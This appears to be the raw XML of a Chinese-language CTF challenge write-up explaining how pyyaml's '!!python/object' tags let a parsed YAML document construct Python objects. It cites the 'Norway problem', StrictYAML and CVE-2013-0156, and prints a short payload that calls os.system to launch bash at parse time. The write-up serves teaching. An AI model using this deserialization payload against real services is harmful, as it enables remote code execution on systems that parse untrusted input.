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答案"/>
      <w:r>
        <w:rPr/>
        <w:t>答案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>./encode.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>即可</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="背景"/>
      <w:r>
        <w:rPr/>
        <w:t>背景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>出题思路来源于</w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>这个博客</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>。一开始偶然接触到了</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的</w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>“挪威问题”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>(Norway problem)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，想着以这个为主题出一个题，但没有好的思路。顺着“挪威问题”我找到了上述博客，作者在项目</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>StrictYAML</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中把</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>本身的问题以及</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pyyaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>不足的地方全都批判了一番，其中有一点便是用</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pyyaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以生成任意</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>对象，同样的问题在</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Ruby</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>甚至造成</w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ruby on Rail</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>的一个</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>(CVE-2013-0156)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。因此我便尝试在</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中引入类似的漏洞，发现很容易在一个用</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pyyaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>解析用户输入的程序中实现</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE,</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>于是就稍微改成了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Misc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="解析"/>
      <w:r>
        <w:rPr/>
        <w:t>解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>如</w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>博客</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>以及</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>官方文档</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>所说，</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pyyaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在解析</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文本</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件的时候可以用一种方式把</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文本直接解析为</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>对象，甚至能做到任意</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>代码执行（摘自官方文档）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Objects</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Any pickleable object can be serialized using the !!python/object tag:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>!!python/object:module.Class { attribute: value, ... }</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>In order to support the pickle protocol, two additional forms of the !!python/object tag are provided:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>!!python/object/new:module.Class</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>args: [argument, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>kwds: {key: value, ...}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>state: ...</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>listitems: [item, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>dictitems: [key: value, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>!!python/object/apply:module.function</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>args: [argument, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>kwds: {key: value, ...}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>state: ...</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>listitems: [item, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>dictitems: [key: value, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>If only the args field is non-empty, the above records can be shortened:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>!!python/object/new:module.Class [argument, ...]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>!!python/object/apply:module.function [argument, ...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>于是构造这样的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yaml,</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在解析阶段就能够执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>!!python/object/new:os.system</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>args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"bash"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>该特性可以调用</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中任意模块的函数和类构造，功能很强大</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>答案用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，解法不止一种</w:t>
      </w:r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itchdev.com/strictyaml/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hitchdev.com/strictyaml/why/implicit-typing-removed/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hitchdev.com/strictyaml/why/not-parse-direct-representations-of-python-objects/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pyyaml.org/wiki/PyYAMLDocumentation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2</Pages>
  <Words>417</Words>
  <Characters>1119</Characters>
  <CharactersWithSpaces>1217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2025-07-29T07:20:01Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>zh-CN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-29T15:20:59Z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